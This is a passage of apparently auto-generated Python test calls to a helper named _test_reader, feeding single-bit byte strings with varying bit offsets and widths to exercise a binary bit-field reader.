_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 64, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 63, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 62, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 61, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 60, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 59, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 58, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 57, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 56, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 55, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 54, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 53, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 52, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 51, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 50, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 49, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 48, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 47, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 46, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 45, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 44, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 43, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 42, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 41, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 40, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 39, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 38, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 37, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 36, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 35, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 34, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 33, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 64, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 63, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 62, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 61, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 60, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 59, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 58, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 57, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 56, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 55, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 54, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 53, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 52, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 51, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 50, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 49, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 48, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 47, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 46, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 45, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 44, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 43, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 42, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 41, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 40, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 39, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 38, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 37, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 36, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 35, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 34, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 33, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
